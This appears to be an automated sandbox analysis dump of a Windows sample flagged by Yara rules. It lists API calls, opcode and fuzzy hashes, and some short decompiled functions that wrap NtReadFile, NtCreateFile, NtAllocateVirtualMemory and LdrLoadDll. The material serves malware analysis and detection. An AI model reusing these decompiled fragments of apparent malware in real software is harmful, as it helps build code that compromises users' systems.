                                                                        • Instruction Fuzzy Hash: 9C814570A00B058FDB28CF2AD55475ABBF1FF88204F008A6DD586DBB54DB75E8158B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01B3DD8A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: ebbb030fdf788d59cae416b8832da474c7b63ad45058b8ed9067a3641c1c6b8c
                                                                        • Instruction ID: b99c2649046979138d28bb9fb3f05a4d1ed375876ca69a0b0b737599a88bb592
                                                                        • Opcode Fuzzy Hash: ebbb030fdf788d59cae416b8832da474c7b63ad45058b8ed9067a3641c1c6b8c
                                                                        • Instruction Fuzzy Hash: BC51C0B1D003089FDF14CF9AC884ADEBBB5FF88310F64816AE819AB250D7719895CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01B3DD8A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f93f20c994cee3d41e81dc86d44c66cab0a8d81aab7a0c2d211ea2e70a3cbf19
                                                                        • Instruction ID: a557d56b462c8bc937431910557b255062e233a81683735db5525edfc20dbfb6
                                                                        • Opcode Fuzzy Hash: f93f20c994cee3d41e81dc86d44c66cab0a8d81aab7a0c2d211ea2e70a3cbf19
                                                                        • Instruction Fuzzy Hash: 4141CFB1D003089FDB14CF9AC884ADEBBB5FF88310F64812AE819AB250D7759895CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B36E3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 66bfd9d1fd6791a7cc59b76bd794647cbfa40d4c509496e6e11c6c01728f774e
                                                                        • Instruction ID: f16fe638837dbe98a955c965b93b676dc120c442858b036cb9d01fbc48c5d831
                                                                        • Opcode Fuzzy Hash: 66bfd9d1fd6791a7cc59b76bd794647cbfa40d4c509496e6e11c6c01728f774e
                                                                        • Instruction Fuzzy Hash: 56414C76900258AFCF01CF99D844AEEBFF5FB89310F14806AEA14A7361C7759954DFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D0%l
                                                                        • API String ID: 0-3182299250
                                                                        • Opcode ID: 16a8e27cab51e4e1c3691c8290bcab88756c6756c2ab95ca78c2674b5ac595cb
                                                                        • Instruction ID: ae293373df9b2371245571148079a249c790145fa282cf206f5dc49c1cf8cce9
                                                                        • Opcode Fuzzy Hash: 16a8e27cab51e4e1c3691c8290bcab88756c6756c2ab95ca78c2674b5ac595cb
                                                                        • Instruction Fuzzy Hash: 69C18D70E0A2098FCB14DFB8C4407AEBBF6BB88358F108169DD16EB355EB348D458B95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B36E3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: cd9c786c831e6dc5dfaedda5cbc1126081892e34a6bc55fe7386d50262b561a2
                                                                        • Instruction ID: c2f038ea7d4f5ba696ab53d5e464b5a480010b1ee6031ffcbcf43d61fb3e8109
                                                                        • Opcode Fuzzy Hash: cd9c786c831e6dc5dfaedda5cbc1126081892e34a6bc55fe7386d50262b561a2
                                                                        • Instruction Fuzzy Hash: 5921E0B5900218AFDB10CFAAD884BDEBFF8FB48324F14801AE914A3350D374A954CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B36E3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 5c8b1e1640044c1f95c40a7e81df2cc8efe2327fbdfd67d3cbd08f637c49cc17
                                                                        • Instruction ID: e62ba361fa79d2c5df8bf2e2e991026c1504e6d45ae298bdb827291acaa59a72
                                                                        • Opcode Fuzzy Hash: 5c8b1e1640044c1f95c40a7e81df2cc8efe2327fbdfd67d3cbd08f637c49cc17
                                                                        • Instruction Fuzzy Hash: 5821C2B5900218AFDB10CFAAD884BDEFBF8FB48324F14841AE914A3350D375A954CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01B3BE89,00000800,00000000,00000000), ref: 01B3C09A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 92e6decbaff616c6b093dc9be37f413fcdeccd6ae739406eb0ed7cc3daab95f4
                                                                        • Instruction ID: 3c216bbc7ad92e7a5689782207394d65ce9fbfb56cc347fee30bb8ca45455d28
                                                                        • Opcode Fuzzy Hash: 92e6decbaff616c6b093dc9be37f413fcdeccd6ae739406eb0ed7cc3daab95f4
                                                                        • Instruction Fuzzy Hash: E81114B69002488FDB14CF9AC444BDEFBF4EB89324F14846EE915B7200C3B5A555CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01B3BE89,00000800,00000000,00000000), ref: 01B3C09A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 018715B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01B3BE0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,?,?), ref: 01B3DF1D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID:
                                                                        • API String ID: 1378638983-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 01B3FF55
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db693d518c85b6bc0663441d48210f51260ef1b43aa63ef9c09d2511677afe38
                                                                        • Instruction ID: d42e870b16b8e3ff29faed00ed9708c6f889398536c0f229b84668a5e4d135aa
                                                                        • Opcode Fuzzy Hash: db693d518c85b6bc0663441d48210f51260ef1b43aa63ef9c09d2511677afe38
                                                                        • Instruction Fuzzy Hash: 7FD017B0C0030EAFCB50EFB8880579EBBF8AB04200F10487AC914E2201E7B846008FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7ea70942260b652793f9b040fb51036e6fbfed94469f6ef112825230b41b30e
                                                                        • Instruction ID: f748ec7e92165244163dc38df06e1c895388692f5ad1ea826697417651f98112
                                                                        • Opcode Fuzzy Hash: c7ea70942260b652793f9b040fb51036e6fbfed94469f6ef112825230b41b30e
                                                                        • Instruction Fuzzy Hash: 5CD0123221420C5E4B80EF99E840C5277DDBB24B10700C436FE44CB021E722E964D765
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $%!l
                                                                        • API String ID: 0-4161362926
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -
                                                                        • API String ID: 0-2547889144
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 24%
                                                                        			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
                                                                        				intOrPtr* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t22;
                                                                        				void* _t32;
                                                                        				void* _t33;
                                                                        				intOrPtr* _t34;
                                                                        
                                                                        				if(__eflags != 0) {
                                                                        					asm("in al, dx");
                                                                        					_t17 = _a8;
                                                                        					_t34 = _a8 + 0xc48;
                                                                        					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
                                                                        					_t6 =  &_a36; // 0x413d42
                                                                        					_t12 =  &_a12; // 0x413d42
                                                                        					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
                                                                        					return _t22;
                                                                        				} else {
                                                                        					__ebp = __esp;
                                                                        					__eax = _a4;
                                                                        					_t14 = __eax + 0x10; // 0x300
                                                                        					_t15 = __eax + 0xc4c; // 0x40972f
                                                                        					__esi = _t15;
                                                                        					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
                                                                        					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
                                                                        					_pop(__esi);
                                                                        					__ebp = __esi;
                                                                        					return  *__esi;
                                                                        				}
                                                                        			}










                                                                        APIs
                                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: B=A$B=A
                                                                        • API String ID: 2738559852-2767357659
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 21%
                                                                        			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                        				void* _t18;
                                                                        				void* _t27;
                                                                        				void* _t28;
                                                                        				intOrPtr* _t29;
                                                                        
                                                                        				asm("in al, dx");
                                                                        				_t13 = _a4;
                                                                        				_t29 = _a4 + 0xc48;
                                                                        				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                        				_t6 =  &_a32; // 0x413d42
                                                                        				_t12 =  &_a8; // 0x413d42
                                                                        				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
                                                                        				return _t18;
                                                                        			}








                                                                        APIs
                                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: B=A$B=A
                                                                        • API String ID: 2738559852-2767357659
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                        				char* _v8;
                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                        				char _v536;
                                                                        				void* _t15;
                                                                        				struct _OBJDIR_INFORMATION _t17;
                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                        				void* _t32;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_v8 =  &_v536;
                                                                        				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                        				_t33 = _t32 + 0xc;
                                                                        				if(_t15 != 0) {
                                                                        					_t17 = E0041AF60(__eflags, _v8);
                                                                        					_t34 = _t33 + 4;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						E0041B1E0(__ebx, __edi,  &_v12, 0);
                                                                        						_t34 = _t34 + 8;
                                                                        					}
                                                                        					_t18 = E004192F0(_v8);
                                                                        					_v16 = _t18;
                                                                        					__eflags = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                        						return _v16;
                                                                        					}
                                                                        					return _t18;
                                                                        				} else {
                                                                        					return _t15;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                        				long _t21;
                                                                        				void* _t31;
                                                                        
                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                        				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                        				return _t21;
                                                                        			}






                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                        				long _t16;
                                                                        				void* _t25;
                                                                        				signed int _t29;
                                                                        
                                                                        				_t18 = __ebx & _t29;
                                                                        				asm("outsd");
                                                                        				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
                                                                        				_push(_t29);
                                                                        				_t12 = _a4;
                                                                        				_t5 = _t12 + 0xc60; // 0xca0
                                                                        				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                        				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                        				return _t16;
                                                                        			}







                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                                        • Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
                                                                        • Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                                        • Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                        				long _t14;
                                                                        				void* _t21;
                                                                        
                                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                                        				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                        				return _t14;
                                                                        			}






                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004182E0(intOrPtr _a4, void* _a8) {
                                                                        				long _t8;
                                                                        				void* _t11;
                                                                        
                                                                        				_t5 = _a4;
                                                                        				_t2 = _t5 + 0x10; // 0x300
                                                                        				_t3 = _t5 + 0xc50; // 0x409733
                                                                        				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                        				_t8 = NtClose(_a8); // executed
                                                                        				return _t8;
                                                                        			}






                                                                        APIs
                                                                        • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 76c524aee06d93c237d4efb1b41220c2c3c69f76d590b867500da5501d7d23a6
                                                                        • Instruction ID: f1d1ecc56bd682cfab321fe8e2969bc42a45cd14858bb1e80138e436609cd472
                                                                        • Opcode Fuzzy Hash: 76c524aee06d93c237d4efb1b41220c2c3c69f76d590b867500da5501d7d23a6
                                                                        • Instruction Fuzzy Hash: 7B9002B224101402D140719984047460055B7D1351F61C411E9055A58EC6998DD576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5e27ea1f874e579ad2f96ba386a053e52b690d8e735e74a621a092c14ce2ae98
                                                                        • Instruction ID: c31adba7ab39000a69aa5530baa20793567e3b3297392b6f60f46a8a42f1233c
                                                                        • Opcode Fuzzy Hash: 5e27ea1f874e579ad2f96ba386a053e52b690d8e735e74a621a092c14ce2ae98
                                                                        • Instruction Fuzzy Hash: 4690027235115402D1106199C4047060055B7D2251F61C811E4815A5CDC6D588917162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 39623cb13753a924d5ee96336b04fd5d9772a8122283923f55423f9c54c2c757
                                                                        • Instruction ID: 4210e3b9e4c8bcaba400c465809426906ce2d1e64f3447786332c417aa1826e6
                                                                        • Opcode Fuzzy Hash: 39623cb13753a924d5ee96336b04fd5d9772a8122283923f55423f9c54c2c757
                                                                        • Instruction Fuzzy Hash: 5390026A25301002D1807199940860A0055B7D2252FA1D815E4006A5CCC95588696361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2b891688ba23b9930d5cf6819e3100239edb317b9484a066a34e597f0dc42461
                                                                        • Instruction ID: c146efdd1c98c6cb4ba31277c25d2f5bc2c208e1f69ef841d8b08eaa463174db
                                                                        • Opcode Fuzzy Hash: 2b891688ba23b9930d5cf6819e3100239edb317b9484a066a34e597f0dc42461
                                                                        • Instruction Fuzzy Hash: B190026234101003D140719994186064055F7E2351F61D411E4405A58CD95588566262
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e787d76a0cf4aea2218e65eaa13d8555eb469af77efbabe69690af7085c5aaac
                                                                        • Instruction ID: 6d6f00465e483a2c166311f2481c38c40f8d92108541d80b32ad588408a9652b
                                                                        • Opcode Fuzzy Hash: e787d76a0cf4aea2218e65eaa13d8555eb469af77efbabe69690af7085c5aaac
                                                                        • Instruction Fuzzy Hash: 9F90027224101802D1807199840464A0055B7D2351FA1C415E4016B58DCA558A5977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9004a2a5e3da2d686113afc95cebc6710476ef211b4722e57e365643bcd8f994
                                                                        • Instruction ID: 2311735e68e834c5005489ff7dde8c63641954446e9dc397df41ac3de9937c92
                                                                        • Opcode Fuzzy Hash: 9004a2a5e3da2d686113afc95cebc6710476ef211b4722e57e365643bcd8f994
                                                                        • Instruction Fuzzy Hash: E090027224109802D1106199C40474A0055B7D1351F65C811E8415B5CDC6D588917161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                        • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: hA
                                                                        • API String ID: 1279760036-1221461045
                                                                        • Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
